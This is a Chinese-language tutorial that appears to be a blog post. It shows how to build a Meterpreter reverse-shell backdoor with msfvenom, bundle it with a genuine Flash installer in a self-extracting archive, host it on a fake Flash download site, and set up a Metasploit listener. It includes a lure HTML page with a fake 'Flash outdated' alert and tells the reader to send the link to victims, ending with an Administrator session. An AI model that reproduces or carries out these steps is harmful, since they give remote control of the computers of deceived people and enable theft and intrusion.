这里写目录标题
- 一,后门文件生成与制作
- 二,flash安装钓鱼网站搭建
- 三,监听
- 四,钓鱼
 
 
一,后门文件生成与制作
打开kali,查看ip add 查看 ip 地址为 192.168.1.8
 输入 msfconsole
 1.生成后门
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=6666 -f exe > flash.exe
 2.下载官方文件,保证后门可以安装正常
 浏览器输入 https://www.flash.cn/ 进入flash官网
 点击立即下载
 3.找到刚才生成的后门文件和下载的flash文件,通过压缩进行文件捆绑
 下载 WinRAR 软件
 选中两个文件,鼠标右击点击 Add to archive
 
 修改压缩文件名,勾选创建自解压格式压缩文件

 切换到 高级,点击自解压选项
 
 
 下载 Restorator,对图标进行修改
 
 
 然后点击保存
二,flash安装钓鱼网站搭建
fake-flash项目下载
 下载完后在WWW文件夹下新建一个fa文件夹,把下载的文件放到这里边
把制作好的文件上传到文件夹
 
 修改
 <a href="http://localhost/fa/flash_install.exe" target="_self">立即下载</a>

 
三,监听
4.msf配置监听状态
 use exploit/multi/handler
 set payload windows/meterpreter/reverse_tcp
 set lhost 0.0.0.0
 set lport 6666
 run
 
四,钓鱼
诱导受害者访问url http://localhost/fa/,让他点击下载,解压后就执行了
把这段html代码放到一个公网服务器的web容器里,tomcat,nginx 等都行,
 其中把window. location.href=“http://localhost/fa/” 中的localhost换成相应的ip地址,
 把这个html的访问链接发送给受害者,当受害者对这段内容感兴趣时,他会打开然后发现提示flash更新,
 他会点击下载,然后他下载完一解压就上线了
<html xmlns="http://www.w3.org/1999/xhtml"> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>搞笑视频</title> 
</head> 
<body> 
搞笑视频<br>
<img src="https://mmbiz.qpic.cn/mmbiz_gif/hBibMRJsay9tXYRRPGeYq2ViaMImcE69sMJdQ9B0icXFEAyiania5Htlib9GZWO2bEo6dE3C8dicWYibnTWyj5LIu8BRXA/640?wx_fmt=gif&wxfrom=5&wx_lazy=1" alt="" width="300" height=600" align="absmiddle"/ οnclick=a()>
</body> 
</html>
<script>													
function a(){
	alert( "您的FLASH版本过低,尝试升级后访问该页面! ");
	window. location.href="http://localhost/fa/";
}
</script>

电脑管家提示报毒,先暂不处理,先不考虑免杀
 
 成功上线
 
 输入getuid 查看当前用户名 为 Administrator
 



















